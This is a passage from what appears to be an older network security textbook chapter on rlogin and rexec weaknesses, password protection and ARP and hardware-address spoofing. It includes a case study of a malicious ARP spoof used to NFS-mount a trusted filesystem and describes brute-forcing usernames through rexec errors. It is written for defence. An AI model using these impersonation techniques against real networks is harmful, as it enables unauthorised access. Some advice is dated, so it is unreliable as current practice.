Problems with rloginAs mentioned earlier, on a machine with any server for programs in the rlogin protocol familyit is critical that only the user can modify his or her rhosts file. If it is possible for someone elseto modify it then the ability to modify it can be leveraged into the ability to obtain full accessto the account. Note that if your home directory is on an NFS mounted file system exportedto someone else’s machine your rhosts file is vulnerable to simple attacks on NFS. A standardattack for the superuser of another machine is to give you an account on the other machineand then use the su command to gain access to your account on the other machine. The NFSserver is fooled into believing you are accessing your files because it trusts the other machine toauthenticate its users. So far, the attacker is limited to accessing your files, but when he altersyour rhosts file the attacker can begin to run programs that execute with your privileges and dogreater harm.

If an attacker is able to modify the superuser rlogin file or gain access to any account listed init, such access can be leveraged into a very serious attack. In particular, an attacker can use rshto subvert the requirement that Unix superuser logins occur from secure terminals. Unlikerlogin or telnet, rsh does not require a pseudo-tty. If protection of your superuser loginaccount involves restricting insecure terminals, you may want to disable or alter the rshprogram.

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Do not confuse the rexec commands (rexec and rcmd) with the r-commands. The rexecdaemon waits for a username and cleartext password to authenticate a client. It will thenexecute a single shell command. Although this is similar to rsh, rexec requires the transmissionof a cleartext password to be sniffed. Also, it provides two distinct error conditions, one for aninvalid username and one for an invalid password. Hence, a brute-force attack can be mountedby attempting all possible usernames to both determine what usernames are valid and whichusers have no password. A standard login program will not provide this distinction and providea mechanism to prevent rapid-fire attempts to log in. Security conscious system administratorsoften disable the rexec daemon and rexec commands are so seldom known about by users asnot to be missed.

Using Encrypted PasswordsAnother solution is to use encrypted passwords over the network. You must use caution,however, when simplifying this technique. Even with encryption, a sniffer can still record theencrypted password and decipher the encrypted password at his or her leisure. One way aroundthis is to use an encryption key that involves the current time. If the sender and receiver areclosely synchronized, the sniffer must replay the encrypted password within one tick of the twomachines’ shared clock. If the sender and receiver are widely separated, however, this techniquebecomes less practical and effective because shared clocks will lack sufficient time resolution toprevent an attacker from using a quick replay. One way around this lack of close synchroniza-tion is to set a limited number of attempts at typing the password correctly.

It also does not suffice to simply encrypt the password with an algorithm using a key thatallows an attacker to determine the encryption key. The attacker would decrypt it for repeateduse at a later time. Some protocols use an encryption technique equivalent to the one used bythe Unix password program when it stores passwords in the password file. This encryptiontechnique is no longer considered particularly secure against brute force cryptographic attackswhere all likely passwords are encrypted with the same algorithm used by the password file.Any two words that encrypt the same must be the same. Hence, poorly chosen (for example,dictionary words) or short passwords are particularly easy to crack by brute force.

What is required is the use of public key cryptography such as PGP (see Chapter 11). In publickey cryptography (also called asymmetric cryptography), you use separate keys for encryptionand decryption—the decryption key is not computable from the encryption key. The servercan send the client its public key and the client can use that key to encrypt the user password.The server then decrypts the password to verify the authenticity of the user. This is a variationon the classic public key system in which a trustworthy third party holds the public keys, but itsimplifies the case when no mutually trusted third party is available. It also allows the server touse a time-dependent public key to prevent password replay or brute force decryption of arelatively short password.

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Note SRA from Texas A&M provides telnet and FTP without cleartext password exchange.It uses Secure RPC (Remote Procedure Call) authentication. Secure RPC is part of theSun RPC package distributed along with Secure NFS by many vendors and is quitecommon on Unix systems. Secure RPC uses public key cryptography using thepatented Diffy-Hellman algorithm. SRA uses a new random secret key/public keypair for each connection eliminating the need for a separate keyserver.

SRA can be obtained by anonymous ftp to in the directory/pub/tools/unix/TAMU.

The use of Kerberos also prevents cleartext passwords from being sent across the network.Kerberos is a comprehensive authentication system using a sophisticated time varying encryp-tion algorithm and requires that both systems at the ends of a communication connection trusta separate security server to negotiate the authentication. This avoids having servers trustclients to do the authentication, as the rlogin protocol must do. See Chapter 9 for moreinformation on Kerberos.

Zero-Knowledge AuthenticationAnother mechanism for secure authentication without passwords is zero-knowledge proofs.Networks that use this system have a client and a server that share what is in essence a verylong sequence of digits. When the client connects to the server, the server queries the clientabout a set of digits in a small set of positions in the sequence. Because the number of digits inthe sequence is very long, knowledge of a few digits by a sniffer is not sufficient. The serverwill query for a different set of positions each time the client connects.

This type of authentication is growing in popularity. You store the digit sequence held by theclient on a credit card sized device or even in a ring worn by the user. No computer needs tobe carried by a mobile user of this technique; only a few kilobytes of data storage.

RFC 1704 and RFC 1750 provide a good background in the principles of authentication andthe current state of encryption technology for the Internet.

DESlogin 1.3 uses a challenge / response technique in conjunction with DES encryption forauthentication. The latest version is available via anonymous FTP from

S/KEY from Bellcore uses the response / challenge technique as well. S/Key is available viaanonymous FTP to in the /pub/nmh directory. S/Key has support fora variety of platforms, including Unix, Macintosh, and Windows, to generate the onetimepassword used as a response to a challenge. It also includes a replacement for /bin/login andthe FTP daemon on the Unix host.

RFC 1760 describes the system in technical detail.

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Employing Encryption for Entire Connection/SessionPublic key cryptography can manage the authentication process to prevent password sniffingbut is not practical for entire terminal sessions or TCP/IP connections. Public key cryptogra-phy is sometimes called asymmetric because different keys are used for encryption anddecryption with no practical way to compute one key from the other key. Classical, symmetrictechniques are much more computationally simple and practical for entire sessions. Just aspublic key cryptography can be used to authenticate a user, it can also be used to solve the keydistribution problem of a symmetric encryption technique. Each sender receives the keyelectronically with the key encrypted by a public key technique. Thus, the key cannot besniffed and used to decrypt the rest of the session.

One such mechanism employing the RSA public key encryption algorithm is the secure socketlayer (SSL) that is being promoted for use with the Web. Because the entire contents of a TCPconnection are encrypted, you can send credit card numbers over the Internet withoutworrying that someone will intercept them at one of the many routers between the user’s Webbrowser and the merchant’s Web site. You can use SSL as a layer on top of TCP for any serverthat might otherwise use raw TCP.

To take advantage of session encryption on the Web, you must have compatible encryptiontechniques being used on both the browser and the Web server. Typically, encryption is onlyused for transmission of sensitive information such as passwords and credit card information,not routine HTML and image files. Any vendor doing business on the Web should be quiteclear about what encryption techniques the server supports and give a list of some of thebrowsers that support it so that a user will know in advance if the information being sent isprotected by encryption. Conversely, a good browser should indicate if a response to a form onthe Web is not going to be encrypted so that vendors who do not provide a compatibleencryption technique do not endanger their customers.

SpoofingSpoofing can occur at all layers of the IP system. The hardware layer, the data link layer, the IPlayer, the transport layer, and the application layer are susceptible. All application layerprotocols are at risk if the lower layers have been compromised. In this chapter, only theapplication layer protocols intimately linked to the IP protocol are discussed. This includesrouting protocols and the DNS naming protocol. Other application layer protocols depend onthese two protocols to provide basic services to almost all applications using the Internet.

Hardware Address SpoofingAt the hardware layer, any network interface for a shared-media network will have a hardwareinterface address. As you read earlier in the discussion on sniffing, most network interfaces canbe put into promiscuous mode and receive frames with any destination address. A much more

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serious problem occurs if the network interface can alter the source address and send data thatappears to come from various source addresses. In the IEEE 802 standards for networking (ofwhich Ethernet is a variant), each network interface has a 48-bit hardware address. It uses thishardware address to match the variety of destination addresses of the frames it sees. Theinterface copies frames with matching destination addresses into its internal buffer and notifiesthe operating system that they are available for further processing. Packets coming from theoperating system to the interface do not typically specify a source address; the interface alwaysputs its hardware address in the source field.

Most software does not typically control the source field of frames leaving an Ethernetinterface. When another host examines a packet containing a hardware source address associ-ated with an interface of a particular machine, it assumes that the packet originated on thatmachine and accepts it as authentic. An IEEE standards committee assigns each networkinterface manufacturer a unique 24-bit prefix for the 48-bit hardware address; the manufac-turer assigns a unique 24-bit suffix to each interface it makes. Regardless, many interface cardsare configurable and allow host software to specify a source address other than the one assignedby the manufacturer. This configurability makes it possible to use them to spoof the sourceaddress.

DECNet, for example, uses 16-bit identifiers and requires that the leading 32 bits of thehardware address be set to a fixed value to indicate that the packet is a DECNet packet. Anynetwork interface that is compatible with DECNet can have its hardware source addressaltered in some way, either by software or switches on the interface board.

To see how common it is for a network interface to be able to spoof the source address,however, recall how a bridge works. A bridge not only puts its interfaces into promiscuousmode, but it also sets the hardware source address of packets sent out on its interfaces to matchthe hardware source address of the originating interface. A PC with two software configurableinterfaces can be configured to be used as a bridge. Clearly, such software configurability has avariety of malicious uses. The drawbridge software mentioned in the previous section onhardware barriers to prevent sniffing is compatible with most Ethernet boards which meansmost Ethernet boards will permit source address spoofing.

As you can see, it is not entirely safe to base the authenticity of a packet on the hardwaresource address. Unfortunately, there is very little you can do to protect yourself against suchdeviousness. One solution is to use digital signatures at the application layer. Unfortunately,currently there are no protections in the IP network layer that will prevent a hardware addressspoofer from disguising one machine as another. If the victim machine is trusted (for example,is allowed to NFS mount filesystems from another machine), the spoofer will be able to takeadvantage of that trust and violate security without being detected. Fortunately, hardwareaddress spoofing is difficult (relative to many other spoofing methods) and requires penetrationof physical security.

Countering hardware level spoofing is difficult because it is virtually undetectable withouttracing the physical wiring. You need to trace the wiring to be certain no one has connected an

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unauthorized machine and you also need to check to see if the authorized machines are usingthe hardware address they should. The latter can be checked using sufficiently “intelligent”hubs in secure locations.

All machines not in physically secure locations can be connected to hubs in secure locations.Some “intelligent” hubs can be configured to accept or send packets or both to or from specifichardware addresses on each port they service. Thus, you can configure the hub to accept onlypackets with hardware addresses matching the manufacturer-assigned hardware address of theinterface on the authorized machine. This interface should be connected to the wall plate onthe far side of the wires connected to that port. Clearly, you are still relying on physicalsecurity to be sure that the hub, wires, and authorized machine remain as they should.

Note Devices that perform hardware address verifications cannot be categorized as“hubs” in the traditional sense and are probably actually specialized switches orbridges. However, they are marketed as “active hubs” or “filtering hubs.” Such hubsare available from 3Com, HP, and IBM.

ARP SpoofingA more common form of spoofing that is accidental is ARP spoofing. ARP (Address Resolu-tion Protocol) is part of Ethernet and some other similar protocols (such as token-ring) thatassociate hardware addresses with IP addresses. ARP is not part of IP but part of theseEthernet-like protocols; ARP supports IP and arbitrary network-layer protocols. When an IPdatagram is ready to go out on such a network, the host needs to know the hardware destina-tion address to associate with the given IP destination address. For local IP destinations, thehardware address to use will be the hardware address of the destination interface. For non-localdestinations, the hardware address to use will be the hardware address of one of the routers onthe local network.

How ARP and ARP Spoofing WorkTo find the hardware address, the host sends out an ARP request using the hardware broadcastaddress. A frame with the hardware broadcast address reaches every network interface on thelocal network, and each host on the local network has its operating system interrupted by thenetwork interface. The ARP request is essentially asking the question, “What is the hardwareaddress corresponding to the IP address I have here?” Typically, only the host with thematching IP address sends an ARP reply and the remaining hosts ignore the ARP request. TheARP request contains the IP address of the sender of the request and reaches all hosts via abroadcast.

Other hosts could potentially store the association between hardware address and IP address ofthe sender of the request for future reference. The target of the request certainly would storethe association. It will almost certainly send an IP datagram in reply to the IP datagram it isabout to receive. The reply will require knowing the association between the IP address andthe hardware address of the sender of the ARP broadcast.

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The association between the hardware address and the IP address of other machines on anetwork is stored in an ARP cache on each host. When an IP datagram is about to leave a host,the host consults the ARP cache to find the destination hardware address. If the host finds anentry for the IP destination address, it need not make an ARP request. The entries in an ARPcache expire after a few minutes.

Thus, when the ARP cache entry for a machine expires, an ARP request goes out to refresh theentry. No reply comes back if the target machine goes down. The entries for its interface’shardware will disappear from the ARP caches in the other machines on the network. The othermachines will be unable to send out IP datagrams to the downed system after the ARP cacheentries expire. Before that point in time, IP datagrams are sent out but are not received. Whenthe machine comes back up, it will again be able to reply to ARP requests. If someone replacesits interface, the now up and running machine will have a new hardware address and will usethat new hardware address in ARP replies. ARP caches throughout the network will reflect thechange, and IP datagrams go out using the new hardware address.

Because you expect the IP address to hardware address association will change over time, thepotential exists that the change may be legitimate. Sometimes it is purely accidental. Someonemay inadvertently assign a machine the same IP address held by another machine. On personalcomputers or special purpose devices such as network printers or X Window System terminals,the end user typically has access to a dialog box, command, or text file that sets the IP address.

On multiuser systems, the system administrator is typically the only one who can set the IPaddresses of the network interface(s). This arrangement is changing, however, as more inexpe-rienced IP-based end users with PCs set addresses. In addition, bureaucracies often separatesystem administrators and network administrators that use the same network. Under suchcirc*mstances it is common for two machines to end up with the same IP address. Duplicationcan occur either by copying the network configuration from one personal computer to anotherwithout the end user knowing the need for IP addresses to be unique. Duplication can alsooccur if system administrators on a network do not work together when configuring systemaddressing.

When two machines end up with the same IP address, both of them will naturally reply to anARP request for that address. Two replies to the request come back to the host that originatedthe request. These replies will arrive in rapid succession, typically separated by at most a fewmilliseconds. Some operating systems will not realize anything is wrong and simply file eachreply in the ARP cache with the slowest response remaining in the ARP cache until the entryfor that IP address expires. Other operating systems will discard ARP replies that correspond toIP addresses already in the cache. These may or may not bother to check if the second replywas a harmless duplicate or an indication an ARP spoof may be underway.

Thus, depending on the mechanism used to process duplicate ARP replies, if a spoofer wantsto be the target of the IP datagrams being sent to a particular IP address from a particular host,it needs to make sure it is either the first or the last to reply to ARP requests made by thatparticular host. An easy way to be first or last is to have the only machine that replies to the

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ARP requests. An attacker can simply use a machine assigned, via the normal operating systemconfiguration mechanisms, the same IP address as a machine that is currently not working. Anattacker attempting to masquerade his or her machine can simply turn the legitimate machineoff. The attacker does not need to have direct access to the power switch on the machine. Themachine can be turned off either by unplugging it or flipping the appropriate circuit breaker.

An alternative to disconnecting its power is to disconnect it from the network at some point inthe network wiring scheme. Third, the attacker can change the legitimate machine’s IP addressand leave it turned on if he or she can reconfigure the machine. Doing so is less likely to drawattention or result in confusion from the machine’s user or administrator.

A Case Study: Inadvertent ARP SpoofingAt a Department of Computer Services in a midwestern university, a room is set aside formaking presentations to groups of clients. The room is equipped with a Unix workstation anda $15,000 ceiling-mounted video projector projecting onto a $2,000 eight-foot diameterscreen. One day, the workstation needed to be replaced with a newer model. The new worksta-tion came in and was being configured to match to the configuration of the workstation in thepresentation room. One of the first questions asked during the operating system installationprocess was the IP address. The technician in charge of configuring the new workstationlooked up the IP address of the workstation in the presentation room and entered it into thedialog box.

After a short time, the new workstation was up and running. The systems staff wanted to besure it was working correctly because it was difficult to fix after it was installed in the presenta-tion room. The new workstation was turned off that night after testing the shutdown proce-dure to be used by the presenters.

The next morning a presentation started in the presentation room with the old workstation.All was going well until the systems staff decided to resume testing of the new workstation.Shortly after the new workstation booted, the presentation came to a complete halt. Theperson in charge of the presentation was using the X Window System to demonstrate aprogram running on a better computer. The workstation in the presentation room hadestablished a TCP/IP connection with the better machine and the presenter was creating theillusion that the program was running on the old workstation.

What had happened was the better computer had created an ARP cache entry for the oldworkstation when the presenter started the TCP/IP connection. As the presentation pro-gressed, the ongoing IP datagrams from the better computer to the old workstation used thecache entry created at the beginning of the presentation. Several minutes into the presentationthe ARP cache entry expired and a new ARP request went out from the better computer. Thefirst time the ARP cache entry expired, the old workstation replied appropriately. The nexttime the ARP cache expired, however, the new workstation had been started. Both the old andnew workstations replied to the computer running the demonstration software. The newworkstation’s hardware address ended up in its ARP cache and the new workstation began

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receiving the IP datagrams sent to the IP address the old and new workstations shared. Thenew workstation did not know what to do with these datagrams and promptly sent a TCP/IPreset message in reply, resulting in the shutdown of the demonstration program. From initialappearances, the demonstration program just stopped and the old workstation appeared tohave been cut off from the network.

Needless to say, the presenter was upset. When the system administrator figured out what hadgone wrong, the technician who used the IP address of an existing machine learned a valuablelesson: two machines with the same IP address cannot be connected to the network at the sametime.

A Case Study: Malicious ARP SpoofingAs mentioned earlier, I work at a university where Computer Science allows its clients (stu-dents) temporary access to its computers. These include some Unix workstations using NFS tomount a mission-critical filesystem. One of these clients has a laptop running Unix. He alreadyknows the IP address of the workstations that NFS mount the mission-critical filesystems. Thisparticular user has created a copy of the workstation password file on his laptop and hassuperuser privileges on his own laptop, which runs Unix with NFS.

One day he is left alone in the room with one of our workstations. He shuts down the worksta-tion and jacks his laptop into our network. After a few minutes the file server’s ARP cacheentry for the workstation expires. Then, he launches an attack by telling his workstation toNFS mount our mission-critical filesystem. The mount daemon on the file server checks the IPaddress of the machine making this request against the list of authorized IP addresses and findsa match. It then proceeds to send information needed to access the NFS daemon back to theIP address that just made the mount request.

When the mount daemon sends the reply back, the low-level software connecting IP toEthernet discovers that it does not have an ARP cache entry for this IP address. It puts thereply on hold and makes an ARP broadcast to determine the hardware address to which tosend the reply. The attacker’s laptop is the only machine to respond. The low-level softwaretakes the response, caches it, and uses it to take the reply out of the holding bin and send it outthe Ethernet interface. The attacker succeeds in accessing the mission-critical filesystem as if hewere a legitimate user of the workstation that he just turned off.

Preventing an ARP SpoofIt is not particularly satisfying to simply detect ARP spoofing, which only identifies a problemafter it has already occurred. Although it may not be possible to prevent ARP spoofing entirely,one simple precaution can be taken where it may count the most. The devious thing about anARP spoof is that the attack is really directed at the machine being deceived, not the machinewhose IP address is being taken over. Presumably, the machine or machines being deceivedcontain data that the ARP spoofer wants to get or modify.

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The deception is useful to the ARP spoofer because the legitimate holder of the IP address istrusted in some way by the machine being deceived. Perhaps the trusted machine is allowed toNFS mount filesystems, use rlogin, or start a remote shell without being prompted for apassword (particularly troublesome for privileged user accounts). Ideally, machines extendingsuch trust should simply not use ARP to identify the hardware addresses of the machines theytrust.

Stop Using ARPMachines extending trust to other machines on the local network based on an IP addressshould not use ARP to obtain the hardware address of the trusted machines. Instead, thehardware address of the trusted machines should be loaded as permanent entries into the ARPcache of the trusting machine. Unlike normal ARP cache entries, permanent entries do notexpire after a few minutes. Sending a datagram to an IP address associated with a permanentARP cache entry will never result in an ARP request. With no ARP request being sent, anattacker does not have the opportunity to send an ARP reply. It seems unlikely that anyoperating system would overwrite a permanent ARP cache entry with an unsolicited ARPreply.

With permanent ARP cache entries for trusted machines, the trusting host will not use ARP todetermine the correct hardware address and will not be fooled into sending IP data to an ARPspoofer. Of course, it will also send IP data to the machine even if the machine has been downfor some time. Another downside to permanent ARP entries is that the cache entries will needrevising if the hardware address changes for a legitimate reason. Finally, ARP caches may be oflimited size, limiting the number of permanent entries or further limiting the time a dynamicentry spends in the cache.

Displaying ARP Cache EntriesOn Unix and Windows 95/NT machines, you use the arp command to manipulate andinspect the ARP cache. This command has several options.

arp -a

The -a option displays all ARP cache entries for all interfaces of the host. The following outputis an example of what you would see on a Windows 95 machine:

Interface: Address Physical Address Type147.226.112.1 aa-00-04-00-bc-06 static147.226.112.88 08-00-20-0b-f0-8d dynamic147.226.112.101 08-00-2b-18-93-68 static147.226.112.102 08-00-2b-1b-d7-fd static147.226.112.103 00-00-c0-63-33-2d dynamic147.226.112.104 00-00-c0-d5-da-47 dynamic147.226.112.105 08-00-20-0b-7b-df dynamic147.226.112.106 08-00-20-0e-86-ef dynamic147.226.112.124 08-00-2b-1c-08-68 dynamic147.226.112.169 08-00-09-2a-3c-08 dynamic

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Deleting an ARP Cache EntryAt some point you may want to delete a permanent ARP cache entry that is no longer valid ordelete a dynamic entry that you suspect of being spoofed. The -d option deletes the entry withthe given IP address from the ARP cache.

arp -d

Inserting a Permanent ARP Cache EntryThe -s option inserts a permanent (static) ARP cache entry for the given IP address. Typically,the Ethernet address would be obtained by displaying the entire ARP cache as shown previ-ously.

arp -s 08-00-2b-18-93-68

To ensure that the address is in the ARP cache you can first use the ping command to send anICMP/IP echo request to the IP address in question. A somewhat more secure, but tedious,method is to use an operating system dependent method for querying the machine in questionfor its own hardware address from its console. You can place a series of such commands intothe startup script for the machine that will be extending trust to others.

Inserting Many Permanent ARP Cache EntriesThe -f option loads permanent entries into the ARP cache from a file containing an IP addressto hardware address database.

arp -f arptab

In this example, the file is named “arptab,” but the name of the file is up to the systemadministrator using the command. The -f option to the arp command is not available on allsystems. In particular, it is missing from the current versions of Windows 95 and WindowsNT. However, it is really just a substitute for a series of arp commands with the -s option.

Use an ARP ServerThe arp command outlined in the previous section also allows one machine to be an ARPserver. An ARP server responds to ARP requests on behalf of another machine by consulting(permanent) entries in its own ARP cache. You can manually configure this ARP cache andconfigure machines that extend trust based on this IP address to use ARP replies coming fromthe ARP server rather than ARP replies from other sources. However, configuring a machine tobelieve only in the ARP server is a difficult task for most operating systems.

Even if you do not configure other machines to trust only the ARP server for ARP replies, thetype of server may still be beneficial. The ARP server will send out a reply to the same requestsas a potential ARP spoofer. When machines process the ARP replies, there is at least a fairchance that the ARP spoofer’s replies will be ignored. You cannot be sure because as you haveseen, much depends on the exact timing of the replies and the algorithms used to manage theARP cache.

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Introduce Hardware BarriersThe use of bridges or switches removes the threat of sniffing between network segments;likewise, the use of routers removes the threat of ARP spoofing between IP subnets. You canseparate the trusted hosts (those with IP addresses that might benefit an attacker using ARPspoofing) from subnets on which an attacker might obtain access. Subnetting for security ishelpful if physical security prevents attachment to the subnet of the trusted machine. Suchsubnetting prevents a spoofer from powering down one of the trusted machines and attachingto the subnet on which ARP requests from the trusting machine are broadcast.

A temptation when considering using subnetting to protect from ARP spoofing is to place themachine extending trust on a separate subnet from the machines to which it is extending trust.However, this setup simply places the router in the position of being deceived by an ARPspoof. If trust is extended on the basis of IP addresses, the machine extending the trust is inturn trusting the routers to deliver the IP datagrams to the correct machine. If the trustedmachines are on a separate subnet that is susceptible to ARP spoofing, the router for thatsubnet must bear the burden of ensuring that IP datagrams get to their legitimate destination.With this setup, you might need to place permanent ARP cache entries for the trustedmachines in the router itself.

Finally, it is also important that trusted machines be protected from an ARP spoofer that isattempting to masquerade as the router. Fortunately, routers are typically physically secure andcrash rarely or for very little time, which makes them difficult to impersonate.

Sniffing Case Study RevisitedTo illustrate ARP spoofing in a familiar context, recall the solution to the sniffing problemadopted by Computer Science in the case study earlier in the chapter (see fig. 6.7). Thesolution to the sniffing problem was to divide the portion of the network servicing ComputerScience into five segments. These segments connect to a switch in the Computer Sciencemachine room. The only router being used is the router that joins Computer Science with thetwo segment subnet for Mathematics and the one segment subnet for English. All five seg-ments in Computer Science are part of a single subnet.

Within a single subnet an ARP request goes out to all machines on the subnet and a reply maycome back from any of them. Thus, an ARP spoof attack may be launched from any of thesegments. To prevent this, the segments may be divided into a group of subnets rather than asingle larger subnet.

The analysis of the situation for the ARP spoofing problem is analogous to that for the sniffingproblem. The trust that a machine will not sniff is replaced by the trust that a machine will notARP spoof. The hardware barrier used to control ARP spoofing is a router to inducesubnetting rather than a bridge or a switch to induce segmenting.

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The simple solution to the ARP spoofing problem for Computer Science is to simply placeeach segment on its own single-segment subnet by replacing the switch with a router. How-ever, the two staff segments that were kept separate for reasons other than satisfying the trustconstraints may share a subnet.

One major benefit to this solution is the ease in which routers can perform media conversion.The subnet for the machine room can use high-speed network media such as Fast Ethernet,FDDI, or HyperChannel. The client and staff subnets can use lower speed network mediasuch as 10 Mbps Ethernet or 4 Mbps token ring.

Problems arise, however, with respect to routing protocols. If the Central Computing routercontrols the router in the communication closet and does not trust the Computer Sciencerouter, they cannot exchange routing information. The Central Computing router will refuseto accept the routes advertised by the Computer Science router, cutting off a way for remotemachines to send datagrams to machines on subnets not directly attached to the CentralComputing router. Machines on the Computer Science subnets not directly connected to theCentral Computing router will be forced to interact with the central computing facility byusing the hosts in the Computer Science as intermediaries. Such a use of intermediaries isknown as a “proxy” arrangement.

A proxy arrangement is actually an attractive setup from a security standpoint, but can be quiteawkward for end users. A simple proxy Web server in the Computer Science machine roomwill reduce this awkwardness. Another, more sophisticated proxy arrangement would be to giveIP addresses to Computer Science machines that make them appear to be on the same subnetfrom the perspective of the Central Computing router. The Central Computing router willmake ARP requests to determine where to send the datagrams it is forwarding to a ComputerScience segment it is not connected to. The Computer Science router can perform a “proxyARP” and reply with its own hardware address. The datagrams will be delivered to theComputer Science router for forwarding, while the Central Computing router is led to believeit delivered the datagram to its destination. In essence, the Computer Science router isperforming a beneficial ARP spoof: it benefits the machines on the Computer Science subnets,and it spoofs the Central Computing router.

Detecting an ARP SpoofUnless you have the capability to introduce the kind of hardware barriers described previously,preventing an ARP spoof is probably not practical. The best you can usually hope for is rapiddetection followed by some form of intervention. When an anomaly is detected in the ARPprotocol it may be legitimate, accidental, or a security breach. Policies and procedures shouldbe in place to handle each type of incident. This chapter limits its discussion to mechanisms; itis up to the reader to decide what policies and procedures to implement after detection of apotentially serious problem takes place.

Several mechanisms exist for detecting an ARP spoof. At the host level, an ordinary host mayattempt to detect another machine using its own IP address either by passively examining

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network broadcasts or by actively probing for such a machine. At the server level, a machineproviding a supposedly secure service to the network—perhaps a file server or a router—mayalso attempt to detect an ARP spoof by one of its clients. Finally, at the network level, amachine under control of the network administrator may examine all ARP requests and repliesto check for anomalies indicating an ARP spoof is underway.

Host-Level Passive DetectionAs a basic precaution, when an operating system responds to an ARP broadcast, it shouldinspect both the sender IP address and the target IP address. It only needs to check the targetaddress to see if the target IP address matches its own IP address. If so, it needs to send an ARPreply. However, once the operating system has been interrupted, it takes little extra work tocheck to see if the sender IP address matches its own. If so, another machine on the network isclaiming to have the same IP address. Such an anomaly certainly indicates a serious configura-tion problem and may be the result of a simplistic ARP spoof in which the attacker simplyreset the IP address of the machine being used in the attack. Many Unix systems perform sucha check.

Host-Level Active DetectionAnother precaution to detect ARP spoofs is to arrange for hosts to send out an ARP request fortheir own IP address, both on system startup and periodically thereafter. If the host receives anARP reply for its own IP address, the IP software should report the detection of an ARP spoofto the host user or administrator. Actively querying ARP with one’s own IP address will catchinadvertent IP address misconfigurations as well as an attacker who is simply using an ordinaryoperating system with a deliberately misassigned IP address. However, it is possible to mount amore sophisticated attack that will thwart the active query detection method.

In particular, a technically adept attacker might modify the operating system of the machinebeing used to mount the attack. A simple modification that thwarts the active query detectionmethod is to not reply to ARP requests originating from the legitimate interface associatedwith the IP address being used. The availability of such sophisticated software may seemunlikely even to an advanced computer user.

However, freely distributed Unix-like operating systems with freely distributed source code arenow very common. It is not particularly difficult for a determined attacker to obtain such anoperating system. He or she could then modify its kernel at the source code level, and compilea modified kernel specifically for the purpose of mounting such an attack.

Server-Level DetectionAlternatively, a more elaborate precaution would be to verify an ARP reply by making anRARP request for the hardware address contained in the reply. RARP, the reverse addressresolution protocol, uses the same format as ARP and also broadcasts requests. RARP requestsask the question “What is the IP address associated with the hardware address I have here?”

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Traditionally, the primary use of RARP is by diskless machines with no permanent modifiablememory. Such machines need to discover their own IP address at boot time. RARP relies onone or more RARP servers that maintain a database of hardware addresses and the correspond-ing IP addresses. Use of an RARP server is probably overly elaborate when an ARP serverwould do the same job.

Note The basic idea of checking the validity of the results to a query by making aninverse query is generically useful. That is, in many situations you are querying asystem equivalent to a database. Suppose you use one value, X, as a key for a querywith the database indexed on one field and get a second value, Y, from a secondfield as a result. Then, you can use Y as they key for a query with the databaseindexed on the second field and you should get X as a result. If you do not, thensomething is wrong with the database or its searching mechanism.

Network-Level Detection: The MotivationThe motivation for network-level detection is that host-level detection may be unable toeffectively inform the network staff that a problem exists and that server-level detectionprobably requires modification of IP software of the operating system source code. When ahost detects that it is being impersonated by another machine, it may be able to report the factto its user, but once an attack is underway it may be unable to inform the network administra-tor who is presumably using another machine.

Some popular IP system software may very well take the precaution of occasionally makingARP requests for the hardware address associated with the IP address it believes is its own. Theactive querying precaution is well-known and is a common textbook exercise. Most corporatesystem staffs are unable to modify the IP software of most of the machines on their network. Ifthat is your situation, you probably want a software detection system that can be deployed on asingle machine on your network. Building the system using software already written bysomeone else is preferable.

Network-Level Detection via Periodic PollingBy periodically inspecting the ARP caches on machines, you should be able to detect changesin the IP address to hardware address association on those machines. It should be routine forthe network staff to keep a database of hardware addresses, IP addresses, DNS names, machinetypes, locations, and responsible persons. At the very least, such an inspection can probably bedone manually on most hosts. It could be done more often if hosts could be configured toperiodically report the contents of their ARP caches to a centralized machine. A program onthat machine could look for inconsistencies between hosts, changes from previous reports, andconflicts between reported ARP cache information and the information in the manuallymaintained database—any of these may indicate a problem.

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Standard mechanisms for periodic reporting of network configuration information frommachines on an IP-based network to the network administration staff already exist. One suchmechanism is SNMP—the Simple Network Management Protocol.

In SNMP, each machine using IP runs an SNMP agent which both responds to informationand configuration requests as well as reports certain conditions to the network managementstaff. Virtually all current systems provide bundled SNMP agents. To take advantage ofSNMP, the network management staff must have SNMP management software to query theagents and react to the agent reports. Finding good SNMP management software may bedifficult and expensive to purchase and deploy.

If your network is already employing SNMP for other purposes, including a check on ARPcaches may be simple and inexpensive depending on the sophistication of your SNMPmanagement software. The standard SNMP MIB-I contains the address translation group thatcontains a single table named “at.atTable,” which contains the IP address and hardwareaddress of each interface being monitored by the SNMP agent. The address translation grouphas to be deprecated in SNMP MIB-II to allow for greater flexibility because IP is now nolonger the only protocol being controlled with SNMP. For SNMP agents that use MIB-II, youshould look in the IP address translation table in the IP group named ip.ipNetToMediaTable.

SNMPv1 requests use a “community name” to access a particular view of theMIB. Many SNMPv1 agents are configured with a community name of “public” togive a read-only view of all of the objects in the MIB. Writable views should not beused on an SNMPv1 agent if sniffing is a concern. A sniffer could determine thecommunity name for the writable view and use it to alter the state of the devicebeing controlled by the agent.

Network-Level Detection via Continuous MonitoringA more robust and rapid mechanism for detecting ARP spoofing is to keep an interface on thenetwork in promiscuous mode. A program on the promiscuous interface’s host can inspectevery packet sent on the network and monitor the network on a continuous basis, not justwhen troubleshooting. Such a program can monitor network load, the protocol mix—howmuch of the traffic is IP, how much is IPX, how much is other network-layer protocols—aswell as look for anomalies including ARP spoofing. A network monitor can detect a change inthe association between a hardware address and an IP address and report such changes immedi-ately when they occur.

Brouters, transparent bridges, and switches are all logical places to locate the type of networkmonitor described in the previous paragraph. (Brouters are devices that are combinationbridges and routers—a hybrid device such as the Cisco AGS that is often found inmultiprotocol networks where non-routable protocols must be bridged.) All these devices havetheir interfaces in promiscuous mode all the time, so the monitor would not dramaticallyincrease the load on one of these machines because they are all routinely examining each


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packet. Also, they all typically come with SNMP agents that can send a trap message to thenetwork operations center to report the detection of a potential ARP spoof.

These kinds of systems have a reasonable chance of actually getting such a trap message all theway to the network operations center. However, none of these devices may be successful indoing so if the spoofer is masquerading as the network operations center itself. The trap alsomay be lost if the spoofer is masquerading as a router between the monitor that detects thespoof and the network operations center.

SNMP agents supporting the RMON protocol (as described in RFC 1271) are designed to dolow-level monitoring involving sniffing. On a multisegment network, an RMON/SNMP agentneeds to be placed on each segment to get full coverage of the network. Locating the RMONagent on devices that connect to more than one segment will reduce the number of agents thatneed to be fielded.

Note I am unaware of any good, comprehensive, or affordable commercial packages toimplement SNMP-based ARP spoofing monitors. However, building your ownsystem using freeware packages such as BTNG and Tricklet provides an alternativeto expensive commercial packages.

RFC 1271 describes the RMON protocol.

BTNG (Beholder, The Next Generation) is an RMON agent available from the DelftUniversity of Technology in the Netherlands via anonymous FTP.

